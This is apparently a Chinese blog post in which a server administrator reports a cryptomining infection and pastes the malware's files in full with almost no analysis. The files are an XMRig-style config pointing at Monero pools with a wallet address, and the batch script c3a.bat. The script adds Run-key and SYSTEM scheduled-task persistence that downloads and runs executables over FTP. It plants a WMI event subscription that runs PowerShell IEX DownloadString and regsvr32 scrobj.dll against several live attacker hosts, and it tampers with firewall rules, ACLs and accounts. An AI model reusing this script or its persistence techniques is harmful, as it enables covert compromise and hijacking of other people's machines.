中了挖矿病毒

最近一台服务器运行超级慢，任务管理器查看CPU占用100% ，使用autoruns.exe工具查看到异常任务和进程。
在这里插入图片描述
打开文件路径还发现以下文件，config.json , c3a.bat , wina.exe

config.json 代码如下：

{"api": {"id": null,"worker-id": null},"http": {"enabled": true,"host": "127.0.0.1","port": 81,"access-token": null,"restricted": true},"autosave": true,"background": false,"colors": true,"randomx": {"init": -1,"numa": true},"cpu": {"enabled": true,"huge-pages": true,"hw-aes": null,"priority": null,"memory-pool": false,"asm": true,"cn": [[1, 0],[1, 2],[1, 4],[1, 6]],"cn-heavy": [[1, 0],[1, 2]],"cn-lite": [[1, 0],[1, 2],[1, 4],[1, 6],[1, 1],[1, 3]],"cn-pico": [[2, 0],[2, 2],[2, 4],[2, 6],[2, 1],[2, 3]],"cn/gpu": [0, 2, 4, 6, 1, 3],"rx": [0, 2, 4, 6],"rx/wow": [0, 2, 4, 6, 1, 3],"cn/0": false,"cn-lite/0": false,"rx/arq": "rx/wow"},"opencl": {"enabled": true,"cache": true,"loader": null,"platform": "AMD","cn/0": false,"cn-lite/0": false},"cuda": {"enabled": true,"loader": null,"nvml": true,"cn/0": false,"cn-lite/0": false},"donate-level": 0,"donate-over-proxy": 1,"log-file": null,"pools": [{"algo": null,"coin": "monero","url": "xmr-eu1.nanopool.org:14444","user": "4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.top","pass": "x","rig-id": null,"nicehash": true,"keepalive": false,"enabled": true,"tls": false,"tls-fingerprint": null,"daemon": false,"self-select": null},{"algo": null,"coin": "monero","url": "xmr-eu2.nanopool.org:14444","user": "4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka.top2","pass": "x","rig-id": null,"nicehash": true,"keepalive": false,"enabled": true,"tls": false,"tls-fingerprint": null,"daemon": false,"self-select": null}],"print-time": 60,"health-print-time": 60,"retries": 5,"retry-pause": 5,"syslog": false,"user-agent": null,"watch": true
}

c3a.bat 代码如下：

net1 user mm123$ /del&net1 user admin$a /del&net1 user sysadm05 /del
net stop AnyDesk&sc config AnyDesk start= disabled
attrib -s -h -r C:\Users\Default\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\Default\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\Default\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\asp\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\asp\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\asp\AppData\Roaming\*.exe
attrib -s -h -r C:\Users\administrator\AppData\Local\Temp\*.exe&attrib -s -h -r C:\Users\administrator\AppData\Roaming\Tempo\*.exe&attrib -s -h -r C:\Users\administrator\AppData\Roaming\*.execacls C:\Windows\debug\WIA\*.exe /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\asp\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\Tempo /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo /e /d system&cacls C:\Users\Default\AppData\Roaming\Tempo /e /d everyone&cacls C:\Users\Default\AppData\Roaming\Tempo\*.exe /e /d system&cacls C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f&cacls C:\Users\administrator\AppData\Roaming /e /g everyone:f&cacls C:\Users\asp\AppData\Roaming\*.exe /e /g everyone:f&cacls C:\Users\administrator\AppData\Roaming /e /g everyone:f&cacls C:\Users\asp\AppData\Local\Temp /e /g system:f&cacls C:\Users\asp\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\administrator\AppData\Local\Temp /e /g system:f&cacls C:\Users\administrator\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\Default\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\Default\AppData\Local\Temp /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming /e /g system:f&cacls C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f&cacls C:\Users\Default\AppData\Local\Temp\*.exe /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming\*.exe /e /g everyone:f&cacls C:\Users\Default\AppData\Roaming\*.exe /e /g system:f&cacls C:\SysData\*.exe /e /d system&cacls C:\Msupdate /e /d system&cacls C:\windows\xcecg /e /d system&cacls C:\windows\ccm /e /d system&cacls c:\windows\smss.exe /e /d system&cacls "C:\Program Files\Common Files\Services\*.exe" /e /d system&cacls C:\Windows\System32\a.exe /e /d system&cacls C:\Windows\security\*.exe /e /d system&cacls C:\Windows\security\*.exe /e /d everyone&cacls C:\Windows\Resources\*.exe /e /d system&cacls C:\Windows\Resources\*.exe /e /d everyone&cacls C:\Windows\Resources\Themes\*.exe /e /d system&cacls C:\Windows\Resources\Themes\*.exe /e /d everyone&cacls C:\WINDOWS\system\lsmsm.exe /e /d system&cacls C:\ProgramData\homegroup\*.exe /e /d system&cacls C:\ProgramData\diskdata\*.exe /e /d system&cacls "C:\Program Files\Microsoft Updates" /e /d system&cacls c:\windows\system32\servwdrv.dll /e /d system&cacls c:\windows\system32\servwdrv.dll /e /d everyone&cacls c:\windows\system32\servwdrvx.dll /e /d system&cacls c:\windows\system32\servwdrvx.dll /e /d everyone&cacls c:\windows\system32\serwwdrv.dll /e /d system&cacls c:\windows\system32\serwwdrv.dll /e /d everyone&cacls c:\windows\svchost.exe /e /d system&cacls C:\ProgramData\WmiAppSrv\svchost.exe /e /d system&cacls C:\Windows\Help\taskhost.exe /e /d system&cacls C:\Windows\Web\wininit.exe /e /d system&cacls C:\ProgramData\Microsoft\WmiAppSvr\csrss.exe /e /d system&cacls C:\Progra~1\Common~1\svshpst.exe /e /d system&cacls C:\Windows\fonts\system32\svchost.exe /e /d system&cacls C:\Windows\fonts\*.exe /e /d system&cacls C:\Windows\Fonts\Microsoft /e /d system&cacls "C:\WINDOWS\fonts\*.exe" /e /d system&cacls c:\windows\taskmgrs.exe /e /d system&cacls C:\Windows\security\IIS\*.exe /e /d system&cacls C:\Progra~1\Common~1\System\*.exe /e /d system&cacls C:\Progra~1\dll\*.exe /e /d system&cacls C:\Windows\Fonts\*.exe /e /d system&cacls C:\Progra~1\Common~1\Services\*.exe  /e /d system&cacls C:\Progra~1\Common~1\SpeechEngines\*.exe /e /d system&cacls C:\Windows\Fonts\system32\*.exe /e /d system&cacls C:\Windows\SpeechsTracing\*.exe /e /d system&cacls "C:\Program Files (x86)\Microsoft SvidiaTen\*.exe" /e /d system&cacLS C:\Progra~1\Common~1\Micros~1\*.exe /e /d system&cacls C:\System\*.exe /e /d system&cacls C:\windows\1\*.exe /e /d system&cacls c:\users\public\*.exe /e /d system&cacls "C:\Program Files\Common Files\conime.exe" /e /d system&cacls "C:\Program Files (x86)\Common Files\conime.exe" /e /d system&cacls C:\Progra~1\test\*.exe /e /d everyone&cacls C:\Windows\Fonts\help\*.exe /e /d system&cacls C:\Windows\web\*.exe /e /d system&cacls C:\ProgramData\diskdata\*.exe /e /d system&cacls "C:\Program Files\SQLWriter$\*.exe" /e /d system&cacls C:\Windows\Prefetch\*.exe /e /d system&cacls C:\ProgramData\WmiAppSvr\*.exe /e /d system&cacls C:\Windows\Fonts\Mysql\*.exe /e /d system&cacls C:\ProgramData\WmiAppSvr\*.exe /e /d system&cacls C:\Windows\SysWOW64\drivers\taskmgr.exe /e /d system&cacls C:\Windows\SysWOW64\drivers\svchost.exe /e /d system&cacls C:\Windows\temp\svchost.exe /e /d system&cacls C:\Windows\Fonts\Windows\*.exe /e /d system&cacls C:\Msupdate /e /d system&cacls C:\WINDOWS\Fonts\Windows\*.exe /e /d system&cacls C:\ProgramData\Temp\*.exe /e /d system&cacls C:\Users\Public\Music\*.exe /e /d everyone&cacls C:\Users\Public\Music\*.vbs /e /d system&cacls C:\Windows\Help\lsass.exe /e /d system&cacls C:\Windows\temp\*.dll /e /d system&cacls C:\Windows\debug\Nat\*.exe /e /d system&cacls C:\Windows\Registration\*.exe /e /d system&cacls C:\Users\User\AppData\Roaming\Tempo\*.exe /e /d everyone&cacls "C:\Program Files (x86)\Microsoft Blliasc\*.*" /e /d system&cacls "C:\Program Files (x86)\Microsoft SvidiaTen\*.exe" /e /d system&cacls c:\windows\syswow64\lsass.exe /e /d system&cacls c:\windows\system\lsaus.exe /e /d system&cacls "C:\ProgramData\clr_optimization_v4.0.30318_64\*.exe" /e /d system&cacls "C:\ProgramData\Microsoft\clr_optimization_v4.0.30318_64\*.exe" /e /d system&cacls "C:\ProgramData\CodeGear\Microsoft Office\DataFiles\Windows\Config\Microsoft\Images\Bugger\*.exe" /e /d system&cacls C:\ProgramData\Microsoft\HelpLibrary\*.dll /e /d system&cacls C:\Windows\WBEM\ccproxy\*.exe /e /d system&cacls C:\ProgramData\Microsoft\Network\*.exe /e /d system&cacls c:\windows\system\lsmsm.exe /e /d system&cacls c:\windows\mysql.log /e /d system&cacls C:\Windows\Fonts\Msql\*.exe /e /d system&cacls C:\Windows\Media\Delta\aaf\*.exe /e /d system&cacls c:\windows\wtcs.exe /e /d system&cacls C:\Users\admin\AppData\Roaming\TempoRX\*.exe /e /d everyone&cacls C:\Users\administrator\AppData\Roaming\TempoRX\*.exe /e /d everyonetaskkill /f /im help.exe /im doc001.exe /im dhelllllper.exe /im DOC001.exe /im dhelper.exe /im conime.exe /im a.exe /im docv8.exe /im king.exe /im name.exe /im doc.exe /im wodCmdTerm.exe /im win1ogins.exe /im win1ogins.exe /im lsaus.exe /im lsars.exe /im lsacs.exe /im regedit.exe /im lsmsm.exe /im v5.exe /im anydesk.exe /im sqler.exe /im sqlservr.exe /im NsCpuCNMiner64.exe /im NsCpuCNMiner32.exe /im tlscntr.exe /im eter.exe /im lsmo.exe /im lsarr.exe /im convert.exe /im WinSCV.exe /im ctfmonc.exe /im lsmose.exe /im svhost.exe /im secscan.exe /im wuauser.exe /im splwow64.exe /im boy.exe /IM powered.EXE /im systems.exe /im acnom.exe /im regdrv.exe /im mscsuscr.exe /im Pviunc.exe /im Bllianc.exe /im st.exe /im nvidia_update.exe /im dether.exe /im buff2.exe /im a.exe /im lacas.exe /im lsma.exe /im lsmab.exe /im wtcs.exe /im ASBservice.exe /im vid001.exe /im netsv.exe /im uihost64 /im uihost32.exe /im wina.exe /im microsoft.net.exe /im dmw.exe /im dhcpclient.exe /im ctfnom.exereg add "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll" /f
reg add "HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run" /v "start" /d "regsvr32 /u /s /i:http://js.ftp1202.site:280/v.sct scrobj.dll" /f
reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v "start1" /f
reg delete "HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon" /v "SHELL" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vid001.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost64.exe" /v Debugger /t REG_SZ /d "ntsd -d" /f
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\uihost32.exe" /v Debugger /t REG_SZ /d "ntsd -d" /fecho 127.0.0.1 kr1s.ru>> C:\Windows\System32\drivers\etc\hosts&echo 127.0.0.1 zcop.ru>> C:\Windows\System32\drivers\etc\hostsnet start MSSQLSERVER&del c:\windows\system\my1.bat
cmd /c net1 stop ASBservice&sc delete ASBservice&net1 stop msupdate&sc delete msupdate&net1 stop clr_optimization_v4.0.30328_64&sc delete clr_optimization_v4.0.30328_64&net1 stop MicrosoftMsql&sc delete MicrosoftMsql&net1 stop netsv&sc delete netsv&net1 stop NetworkServices&sc delete NetworkServices&net1 stop "Network Remote"&sc delete "Network Remote"&net1 stop "WinTaskCtrlService"&sc delete "WinTaskCtrlService"&net1 stop remotecall&sc delete remotecall&net1 stop rpcept&sc delete rpcept&net1 stop csrss&sc delete csrss&net1 stop "windows audio control"&sc delete "windows audio control"schtasks /create /tn "Mysa" /tr "cmd /c echo open ftp.ftp1202.site>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe c:\windows\update.exe>>s&echo bye>>s&ftp -s:s&c:\windows\update.exe" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa1" /tr "rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa2" /tr "cmd /c echo open ftp.ftp1202.site>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p" /ru "system"  /sc onstart /F
schtasks /create /tn "Mysa3" /tr "cmd /c echo open ftp.ftp1202.site>ps&echo test>>ps&echo 1433>>ps&echo get s.rar c:\windows\help\lsmosee.exe>>ps&echo bye>>ps&ftp -s:ps&c:\windows\help\lsmosee.exe" /ru "system"  /sc onstart /F
schtasks /create /tn "ok" /tr "rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa" /ru "system"  /sc onstart /F
wmic process where "name='svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\svchost.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\svchost.exe'" delete
wmic process where "name='wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\wininit.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\wininit.exe'" delete
wmic process where "name='csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\csrss.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\csrss.exe'" delete
wmic process where "name='WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\WUDFHosts.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\WUDFHosts.exe'" delete
wmic process where "name='services.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\services.exe' and ExecutablePath<>'C:\\WINDOWS\\syswow64\\services.exe'" delete
wmic process where "name='lsass.exe' and ExecutablePath<>'C:\\WINDOWS\\system32\\lsass.exe'" deletewmic datafile where "Name='c:\\windows\\debug\\lsmos.exe'" get Version /value|findstr "=1\.0\.0\.1$"||((for /f %%a in ('wmic process where "ExecutablePath='c:\\windows\\debug\\lsmos.exe'" get ProcessId^|findstr "[0-9]"') do taskkill /f /pid %%a /t)&del "c:\windows\\debug\lsmos.exe")SCHTASKS /Delete /TN "WindowsUpdate1" /F&SCHTASKS /Delete /TN "OfficeUpdaterA" /F&SCHTASKS /Delete /TN "\Microsoft\Windows\RAC\BackUpEvent" /F&SCHTASKS /Delete /TN "WindowsUpdate3" /F&SCHTASKS /Delete /TN "at6" /F&SCHTASKS /Delete /TN "Windows_Update" /F&SCHTASKS /Delete /TN "Update" /F&SCHTASKS /Delete /TN "Update2" /F&SCHTASKS /Delete /TN "Update4" /F&SCHTASKS /Delete /TN "Update3" /F&SCHTASKS /Delete /TN "windowsinit" /F&SCHTASKS /Delete /TN "System Security Check" /F&SCHTASKS /Delete /TN "AdobeFlashPlayer" /F&SCHTASKS /Delete /TN "updat_windows" /F&SCHTASKS /Delete /TN "at1" /F&SCHTASKS /Delete /TN "at2" /F&SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Enterprise]" /F&SCHTASKS /DELETE /TN "\Microsoft\Windows\UPnP\Services" /f&SCHTASKS /Delete /TN "Microsoft LocalManager[Windows Server 2008 R2 Standard]" /Fsc config MpsSvc start= auto&net start MpsSvc
netsh ipsec static delete policy name=win
netsh ipsec static delete filterlist name=Allowlist
netsh ipsec static delete filterlist name=denylist
netsh ipsec static delete filteraction name=allow
netsh advfirewall firewall delete rule name="tcp all" dir=in
netsh advfirewall firewall delete rule name="deny tcp 445" dir=in
netsh advfirewall firewall delete rule name="deny tcp 139" dir=in
netsh advfirewall firewall delete rule name="tcpall" dir=out
netsh advfirewall set allprofiles state on
netsh advfirewall firewall add rule name="tcp all" dir=in protocol=tcp localport=0-65535 action=allow
netsh advfirewall firewall add rule name="deny tcp 445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="deny tcp 139" dir=in protocol=tcp localport=139 action=block
netsh advfirewall firewall add rule name="tcpall" dir=out protocol=tcp localport=0-65535 action=allow 
netsh ipsec static add policy name=win
netsh ipsec static add filterlist name=Allowlist
netsh ipsec static add filterlist name=denylist
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=135
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=137
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=138
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=139
netsh ipsec static add filter filterlist=denylist srcaddr=any dstaddr=me description=not protocol=tcp mirrored=yes dstport=445
netsh ipsec static add filteraction name=Allow action=permit
netsh ipsec static add filteraction name=deny action=block
netsh ipsec static add rule name=deny1 policy=win filterlist=denylist filteraction=deny
netsh ipsec static set policy name=win assign=y
ver | find "5.1." > NUL && sc config SharedAccess start= auto && echo Yes | reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\NetBT\Parameters /t REG_DWORD /v SMBDeviceEnabled /d 0wmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckyoumm2_filter" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm2_consumer" DELETEwmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="Windows Events Consumer4" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="Windows Events Consumer" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='Windows Events Filter'" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="fuckyoumm4" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="fuckyoumm4" DELETEwmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="fuckayoumm3" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='fuckyoumm3'" DELETEwmic /NAMESPACE:"\\root\subscription" PATH __EventFilter WHERE Name="coronav" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH ActiveScriptEventConsumer WHERE Name="coronav2" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer WHERE Name="coronav2" DELETE
wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding WHERE Filter="__EventFilter.Name='coronav2'" DELETEwmic /NAMESPACE:"\\root\subscription" PATH __EventFilter CREATE Name="fuckamm3", EventNameSpace="root\cimv2",QueryLanguage="WQL", Query="SELECT * FROM __InstanceModificationEvent WITHIN 10800 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'"wmic /NAMESPACE:"\\root\subscription" PATH CommandLineEventConsumer CREATE Name="fuckamm4", CommandLineTemplate="cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://wmi.1103bye.xyz:8080/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://172.83.155.170:8170/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://192.236.160.237:8237/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://144.208.127.215:8215/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.161:8161/power.txt')||powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://103.106.250.162:8162/power.txt')||regsvr32 /u /s /i:http://144.208.127.215:8215/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.161:8161/s.txt scrobj.dll&regsvr32 /u /s /i:http://172.83.155.170:8170/s.txt scrobj.dll&regsvr32 /u /s /i:http://192.236.160.237:8237/s.txt scrobj.dll&regsvr32 /u /s /i:http://103.106.250.162:8162/s.txt scrobj.dll&regsvr32 /u /s /i:http://wmi.1103bye.xyz:8080/s.txt scrobj.dll&wmic os get /FORMAT:\"http://172.83.155.170:8170/s.xsl\""cmd /c start wmic /NAMESPACE:"\\root\subscription" PATH __FilterToConsumerBinding CREATE Filter="__EventFilter.Name=\"fuckamm3\"", Consumer="CommandLineEventConsumer.Name=\"fuckamm4\""cmd /c powershell.exe IEX (New-Object system.Net.WebClient).DownloadString('http://223.25.247.152:8152/batpower.txt')del C:\windows\inf\c3a.bat